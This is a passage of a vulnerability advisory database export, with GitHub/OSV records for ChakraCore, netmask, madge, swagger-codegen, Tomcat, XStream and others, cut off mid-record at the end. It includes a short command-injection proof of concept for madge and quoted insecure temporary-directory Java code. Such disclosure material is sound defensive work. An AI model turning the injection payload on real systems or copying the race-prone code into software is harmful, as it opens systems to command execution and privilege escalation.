'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1103'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/efab3101028045cbfa0cc21bd852f75bcc037dba'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1103'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:36:03Z', 'nvd_published_at': '2019-07-15T19:15:00Z'}" +1.4.0,GHSA-pch5-whg9-qr2r,2023-09-08T20:25:35Z,2021-03-29T21:32:05Z,,['CVE-2021-29418'],netmask npm package mishandles octal input data,"The netmask package before 2.0.1 for Node.js mishandles certain unexpected characters in an IP address string, such as an octal digit of 9. This (in some situations) allows attackers to bypass access control that is based on IP addresses. NOTE: this issue exists because of an incomplete fix for CVE-2021-28918.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'netmask'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29418'}, {'type': 'WEB', 'url': 'https://github.com/rs/node-netmask/commit/3f19a056c4eb808ea4a29f234274c67bc5a848f4'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0001/'}, {'type': 'WEB', 'url': 'https://sick.codes/sick-2021-011'}, {'type': 'WEB', 'url': 'https://sick.codes/universal-netmask-npm-package-used-by-270000-projects-vulnerable-to-octal-input-data-server-side-request-forgery-remote-file-inclusion-local-file-inclusion-and-more-cve-2021-28918/'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/6'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/netmask'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T21:31:24Z', 'nvd_published_at': '2021-03-30T07:15:00Z'}" +1.4.0,GHSA-7vwg-39h8-8qp8,2021-03-11T17:41:09Z,2021-03-11T17:42:01Z,,[],/user/sessions endpoint allows detecting valid accounts,"This Security Advisory is about a vulnerability in eZ Platform v1.13, v2.5, and v3.2, and in Ibexa DXP and Ibexa Open Source v3.3. The /user/sessions endpoint can let an attacker detect if a given username or email refers to a valid account. This can be detected through differences in the response data or response time of certain requests. The fix ensures neither attack is possible. The fix is distributed via Composer. + +If you come across a security issue in our products, here is how you can report it to us: https://doc.ibexa.co/en/latest/guide/reporting_issues/#toc",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-rest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.2.2.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-rest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.3.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-rest/security/advisories/GHSA-7vwg-39h8-8qp8'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-rest/commit/e239bba8b154a3b4cf787e29b9f15edf8945d933'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/ezsystems/ezplatform-rest'}]","{'cwe_ids': ['CWE-203'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T17:41:09Z', 'nvd_published_at': None}" +1.4.0,GHSA-753c-phhg-cj29,2023-09-06T23:33:10Z,2021-03-12T23:01:49Z,,['CVE-2021-23352'],Madge vulnerable to command injection,"This affects the package madge before 4.0.1. It is possible to specify a custom Graphviz path via the graphVizPath option parameter which, when the .image(), .svg() or .dot() functions are called, is executed by the childprocess.exec function. + +### PoC +```js +const madge = require('madge'); +madge('..', {graphVizPath: ""touch HELLO;""}) .then((res) => res.svg()) .then((writtenImagePath) => { console.log('Image written to ' + writtenImagePath); }); +```",[],"[{'package': {'ecosystem': 'npm', 'name': 'madge'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23352'}, {'type': 'WEB', 'url': 'https://github.com/pahen/madge/commit/da5cbc9ab30372d687fa7c324b22af7ffa5c6332'}, {'type': 'WEB', 'url': 'https://github.com/pahen/madge/blob/master/lib/graph.js#L27'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MADGE-1082875'}]","{'cwe_ids': ['CWE-77', 'CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:10:53Z', 'nvd_published_at': '2021-03-09T19:15:00Z'}" +1.4.0,GHSA-h23m-w6x5-jwr4,2021-03-18T21:55:02Z,2021-03-29T21:00:08Z,,['CVE-2019-0923'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0923'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/972584709518380a4a3c2410b5fa151f6f0239b1'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0923'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:55:02Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-pc22-3g76-gm6j,2021-03-22T23:45:20Z,2021-03-11T03:09:16Z,,['CVE-2021-21363'],Generator Web Application: Local Privilege Escalation Vulnerability via System Temp Directory,"### Impact + +On Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. + +This vulnerability is local privilege escalation because the contents of the `outputFolder` can be appended to by an attacker. As such, code written to this directory, when executed can be attacker controlled. + +#### Java Code + +The method `File.createTempFile` from the JDK is vulnerable to this local information disclosure vulnerability. + +https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-generator/src/main/java/io/swagger/generator/online/Generator.java#L174-L185 + + +### Patches + +Fix has been applied to the master branch with: + +* https://github.com/swagger-api/swagger-codegen/commit/987ea7a30b463cc239580d6ad166c707ae942a89 + +included in release: 2.4.19 + + +### References + +* [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html) +* [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html) + +### For more information +If you have any questions or comments about this advisory: + +* Email us at [security@swagger.io](mailto:security@swagger.io) + +#### Original vulnerability report + +> I'm performing OSS security research under the GitHub Security Lab Bug Bounty program. +> I've been using a custom CodeQL query to find local temporary directory vulnerabilities in OSS with three custom CodeQL queries. +> +> - https://github.com/github/codeql/pull/4388/files#diff-71d36c0f2bd0b08e32866f873f1c906cdc17277e0ad327c0c6cd2c882f30de4f +> - https://github.com/github/codeql/pull/4388/files#diff-1893a18a8bf43c011d61a7889d0139b998a5a78701a30fe7722eddd4c506aaac +> - https://github.com/github/codeql/pull/4473 +> +> The code generated by the Swagger Generator contains a local information disclosure vulnerability. The system temporary directory, on unix-like systems is shared between multiple users. Information written to this directory, or directories created under this directory that do not correctly set the posix standard permissions can have these directories read/modified by other users. +> +> --- +> +> This vulnerability exists in the maven plugin. +> +> This vulnerability is distinctly different. This vulnerability is most likely a local privilege escalation vulnerability. +> +> https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-generator/src/main/java/io/swagger/generator/online/Generator.java#L174-L185 +> +> This vulnerability is very similar to this similar vulnerability I disclosed in the Eclipse Jetty project. +> +> https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6 +> +> This is due to a race condition between the call to `delete` and the call to `mkdirs`. +> +> ```java +> // ensure file will always be unique by appending random digits +> File outputFolder = File.createTempFile(""codegen-"", ""-tmp""); // Attacker knows the full path of the file that will be generated +> // delete the file that was created +> outputFolder.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Swagger Code Generator. +> // and make a directory of the same name +> // SECURITY VULNERABILITY: Race Condition! - Attacker beats Swagger Code Generator and now owns this directory +> outputFolder.mkdirs(); +> ``` +> +> This vulnerability is local privilege escalation because the contents of the `outputFolder` can be appended to by an attacker. As such, code written to this directory, when executed can be attacker controlled. +> +> The fix here is to switch to the `Files` API for creating temporary directories. Which does not contain this race condition, and appropriately sets the correct file permissions. +> ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.swagger:swagger-codegen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-codegen/security/advisories/GHSA-pc22-3g76-gm6j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21363'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-codegen/commit/987ea7a30b463cc239580d6ad166c707ae942a89'}]","{'cwe_ids': ['CWE-378', 'CWE-379'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T03:07:41Z', 'nvd_published_at': '2021-03-11T03:15:00Z'}" +1.4.0,GHSA-2cxf-6567-7pp6,2021-07-08T17:02:28Z,2021-03-03T23:01:17Z,,['CVE-2021-21331'],Local Information Disclosure Vulnerability,"### Impact +Local information disclosure of sensitive information downloaded via the API using the API Client. + +### Finding +The Datadog API is executed on a unix-like system with multiple users. The API is used to download a file containing sensitive information. This sensitive information is exposed locally to other users. This vulnerability exists in the API Client for version 1 and 2. The method `prepareDownloadFilecreates` creates a temporary file with the permissions bits of `-rw-r--r--` on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded via the `downloadFileFromResponse` method will be visible to all other users on the local system. + +Analysis of the finding determined that the affected code was unused, meaning that the exploitation likelihood is low. The unused code has been removed, effectively mitigating this issue. + +This vulnerability was found due to [this query](https://lgtm.com/query/8938575359870595124/) that [Jonathan Leitschuh](https://github.com/JLLeitschuh) contributed to the Semmle QL project. + +### Patches +This issue has been patched in [version 1.0.0-beta.9](https://github.com/DataDog/datadog-api-client-java/releases/tag/datadog-api-client-1.0.0-beta.9). + +See also [Remove unused downloadFile helpers](https://github.com/DataDog/datadog-api-client-java/pull/637). + +### Workarounds +The recommended workaround is to specify `java.io.tmpdir` when starting the JVM with the flag `-Djava.io.tmpdir`, specifying a path to a directory with `drw-------` permissions owned by `dd-agent`. + +### References +* [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html) +* [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [DataDog/datadog-api-client-java](https://github.com/DataDog/datadog-api-client-java) +* Email us at [security@datadoghq.com](mailto:security@datadoghq.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.datadoghq:datadog-api-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0-beta.6'}, {'fixed': '1.0.0-beta.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DataDog/datadog-api-client-java/security/advisories/GHSA-2cxf-6567-7pp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21331'}, {'type': 'WEB', 'url': 'https://github.com/DataDog/datadog-api-client-java/releases/tag/datadog-api-client-1.0.0-beta.9'}]","{'cwe_ids': ['CWE-378', 'CWE-379'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-03T22:58:04Z', 'nvd_published_at': '2021-03-03T23:15:00Z'}" +1.4.0,GHSA-537h-rv9q-vvph,2023-09-01T10:08:35Z,2021-03-24T18:24:39Z,,['CVE-2020-13757'],Python-RSA decryption of ciphertext leads to DoS,"Python-RSA before 4.1 ignores leading '\0' bytes during decryption of ciphertext. This could conceivably have a security-relevant impact, e.g., by helping an attacker to infer that an application uses Python-RSA, or if the length of accepted ciphertext affects application behavior (such as by causing excessive memory allocation).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'rsa'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13757'}, {'type': 'WEB', 'url': 'https://github.com/sybrenstuvel/python-rsa/issues/146'}, {'type': 'WEB', 'url': 'https://github.com/sybrenstuvel/python-rsa/issues/146#issuecomment-641845667'}, {'type': 'PACKAGE', 'url': 'https://github.com/sybrenstuvel/python-rsa'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2KILTHBHNSDUCYV22ODLOKTICJJ7JQIQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZYB65VNILRBTXL6EITQTH2PZPK7I23MW/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4478-1/'}]","{'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T18:24:28Z', 'nvd_published_at': '2020-06-01T19:15:00Z'}" +1.4.0,GHSA-m6gj-h9gm-gw44,2023-09-05T14:32:18Z,2021-03-18T20:30:13Z,,['CVE-2020-24583'],Django Incorrect Default Permissions,"An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). FILE_UPLOAD_DIRECTORY_PERMISSIONS mode was not applied to intermediate-level directories created in the process of uploading files. It was also not applied to intermediate-level collected static directories when using the collectstatic management command.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2'}, {'fixed': '2.2.16'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.0.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1'}, {'fixed': '3.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24583'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/8d7271578d7b153435b40fe40236ebec43cbf1b9'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/dev/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/django-announce/Gdqn58RqIDM'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/django-announce/zFCMdgUnutU'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F2ZHO3GZCJMP3DDTXCNVFV6ED3W64NAU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OLGFFLMF3X6USMJD7V5F5P4K2WVUTO3T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZCRPQCBTV3RZHKVZ6K6QOAANPRZQD3GI/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200918-0004/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4479-1/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2020/sep/01/security-releases/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2020/09/01/2'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}]","{'cwe_ids': ['CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-13T00:36:46Z', 'nvd_published_at': '2020-09-01T13:15:00Z'}" +1.4.0,GHSA-9295-mhf3-v33m,2023-08-08T19:54:40Z,2021-03-29T18:25:26Z,,['CVE-2021-28099'],Insecure temporary file in Netflix OSS Hollow,"> ID: NFLX-2021-001 +> Title: Local information disclosure in Hollow +> Release Date: 2021-03-23 +> Credit: Security Researcher @JLLeitschuh + +# Overview + +Security researcher @JLLeitschuh reported that Netflix Hollow (a Netflix OSS project available here: https://github.com/Netflix/hollow) writes to a local temporary directory before validating the permissions on it. + +# Impact + +An attacker with the ability to create directories and set permissions on the local filesystem could pre-create this directory and read or modify anything written there by the Hollow process. + +# Description + +Since the `Files.exists(parent)` is run before creating the directories, an attacker can pre-create these directories with wide permissions. Additionally, since an insecure source of randomness is used, the file names to be created can be deterministically calculated. + +# Workarounds and Fixes + +Avoid running Hollow in configurations that share a filesystem with less-trusted processes. May be fixed in a future release.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.netflix.hollow:hollow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-j83w-7qr9-wv86'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28099'}, {'type': 'WEB', 'url': 'https://github.com/Netflix/hollow/issues/502'}, {'type': 'WEB', 'url': 'https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-001.md'}]","{'cwe_ids': ['CWE-377'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:39:18Z', 'nvd_published_at': '2021-03-23T21:15:00Z'}" +1.4.0,GHSA-qwwr-qc2p-6283,2021-10-21T21:19:32Z,2021-03-22T16:57:07Z,,['CVE-2018-14550'],Out-of-bounds write in libpng,An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'libpng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.37'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.6.35'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-14550'}, {'type': 'WEB', 'url': 'https://github.com/glennrp/libpng/issues/246'}, {'type': 'WEB', 'url': 'https://github.com/fouzhe/security/tree/master/libpng#stack-buffer-overflow-in-png2pnm-in-function-get_token'}, {'type': 'PACKAGE', 'url': 'https://github.com/glennrp/libpng'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201908-02'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20221028-0001/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-UPSTREAM-LIBPNG-1043612'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T15:41:48Z', 'nvd_published_at': '2019-07-10T12:15:00Z'}" +1.4.0,GHSA-5rq8-3wvf-wrfg,2021-03-18T22:10:02Z,2021-03-29T20:59:01Z,,['CVE-2019-0933'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0933'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/1a550c67b33b27675c0553152cabd09e4ffe3abf'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0933'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:10:02Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-jgwr-3qm3-26f3,2022-08-22T19:40:41Z,2021-03-19T20:11:13Z,,['CVE-2021-25329'],Potential remote code execution in Apache Tomcat,"The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.41'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.5.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.108'}]}], 'database_specific': {'last_known_affected_version_range': '< 7.0.107'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25329'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/6d66e99ef85da93e4d2c2a536ca51aa3418bfaf4'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210409-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4891'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/01/2'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:10:56Z', 'nvd_published_at': '2021-03-01T12:15:00Z'}" +1.4.0,GHSA-5wqj-f379-6jh4,2021-03-16T01:08:14Z,2021-03-19T21:19:47Z,,['CVE-2020-28426'],Command injection in kill-process-on-port,All versions of package kill-process-on-port are vulnerable to Command Injection via a.getProcessPortId.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'kill-process-on-port'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28426'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KILLPROCESSONPORT-1055458'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T01:08:14Z', 'nvd_published_at': '2021-02-01T16:15:00Z'}" +1.4.0,GHSA-hvv8-336g-rx3m,2023-03-09T21:21:55Z,2021-03-22T23:28:01Z,,['CVE-2021-21342'],A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host,"### Impact +The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have 